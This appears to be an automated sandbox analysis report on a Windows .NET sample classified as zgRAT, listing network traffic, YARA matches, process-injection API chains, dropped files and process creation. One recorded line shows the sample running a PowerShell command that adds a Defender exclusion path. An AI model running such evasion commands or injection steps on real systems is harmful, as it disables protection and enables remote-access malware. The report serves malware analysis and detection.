                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce39
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknown; HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49707 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49708 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects zgRAT; Author: ditekSHen
                      Source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE; Matched rule: Detects zgRAT; Author: ditekSHen
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE; Matched rule: Detects zgRAT; Author: ditekSHen
                      Source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE; Matched rule: Detects zgRAT; Author: ditekSHen
                      Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY; Matched rule: Detects zgRAT; Author: ditekSHen
                      Source: uh3ex1.exe.1.dr, -Module-.cs; Large array initialization: _206D_200E_206C_200E_206F_202E_202C_206C_202D_206C_206D_200D_206E_206E_202C_202A_202D_202E_206F_202D_200F_200E_200C_200D_202B_200F_206E_202C_200B_200F_206C_206E_202A_202A_200C_206A_202B_202C_202A_200D_202E: array initializer size 54016
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Strings.cs; Large array initialization: Strings: array initializer size 6160
                      Source: C:\Path1\To2\Save444\uh3ex1.exe; Code function: 6_2_6D593C10 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtGetContextThread,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,CloseHandle
                      Source: C:\Path1\To2\Save444\uh3ex1.exe; Code function: 6_2_6D5936D0 GetModuleHandleW,NtQueryInformationProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A42908_2_072A4290
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072AE9008_2_072AE900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A00408_2_072A0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A38E88_2_072A38E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072A8A188_2_072A8A18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472EE88_2_07472EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07476AC08_2_07476AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074749008_2_07474900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0747D9D98_2_0747D9D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07471E488_2_07471E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07471E588_2_07471E58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07479E388_2_07479E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472ED88_2_07472ED8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07472EE78_2_07472EE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074712508_2_07471250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074712608_2_07471260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074751408_2_07475140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074789508_2_07478950
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_074748F08_2_074748F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760B7408_2_0760B740
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076047208_2_07604720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760E3388_2_0760E338
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076090308_2_07609030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076030D88_2_076030D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760D0908_2_0760D090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760AE888_2_0760AE88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07601D808_2_07601D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07602CC08_2_07602CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0760EAE88_2_0760EAE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076004488_2_07600448
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_076030CA8_2_076030CA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07601D708_2_07601D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07602CB08_2_07602CB0
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\gdi32.dll DB4C8F95A46EC357887B98CCA78E3E6257F9EF6E7C965438328AB74A9A43FA8B
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Code function: String function: 6D597C10 appears 33 times
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000344A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUlyssesLiamQuinn.dqH vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUlyssesLiamQuinn.dqH vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000000.1421187680.0000000000F74000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameConsoleApp2.exe8 vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.000000000145E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 9LrEuTWP8s.exe
                      Source: 9LrEuTWP8s.exe Binary or memory string: OriginalFilenameConsoleApp2.exe8 vs 9LrEuTWP8s.exe
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 8.2.MSBuild.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 6.2.uh3ex1.exe.6d590000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: uh3ex1.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Strings.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Class4.cs Cryptographic APIs: 'CreateDecryptor'
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/11@2/3
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9LrEuTWP8s.exe.log
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_podo2qxv.dbg.ps1
                      Source: 9LrEuTWP8s.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 9LrEuTWP8s.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 9LrEuTWP8s.exe ReversingLabs: Detection: 47%
                      Source: unknown Process created: C:\Users\user\Desktop\9LrEuTWP8s.exe "C:\Users\user\Desktop\9LrEuTWP8s.exe"
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Process created: C:\Path1\To2\Save444\uh3ex1.exe "C:\Path1\To2\Save444\uh3ex1.exe"
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, mswsock.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, secur32.dll, edputil.dll, windowscodecs.dll, dpapi.dll
                      Source: C:\Path1\To2\Save444\uh3ex1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: 9LrEuTWP8s.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 9LrEuTWP8s.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: 9LrEuTWP8s.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Bootcherito\source\repos\ConsoleApp2\ConsoleApp2\obj\Release\ConsoleApp2.pdb source: 9LrEuTWP8s.exe

                      Data Obfuscation

                      Source: 6.2.uh3ex1.exe.6d5ab000.4.raw.unpack, Class4.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: uh3ex1.exe.1.dr, -Module-.cs .Net Code: _206D_200F_202A_200F_206D_206F_206D_200D_206C_200B_202E_206A_206B_202A_206C_202B_200D_206A_200B_202E_202B_206D_200C_202A_206D_202B_202A_206C_206E_206E_206B_206C_200B_200E_206D_200D_206D_202C_200E_200C_202E System.Reflection.Assembly.Load(byte[])
                      Source: 9LrEuTWP8s.exe Static PE information: 0xCBA514CB [Thu Apr 7 21:46:51 2078 UTC]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07114D52 push E8070BABh; iretd 8_2_07114D5D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_07117BA8 pushad ; retf 8_2_07117BB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_072AE1F3 push esp; retf 8_2_072AE231
                      Source: uh3ex1.exe.1.drStatic PE information: section name: .text entropy: 7.8298536407435835
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeFile created: C:\Path1\To2\Save444\uh3ex1.exeJump to dropped file
                      Source: C:\Path1\To2\Save444\uh3ex1.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
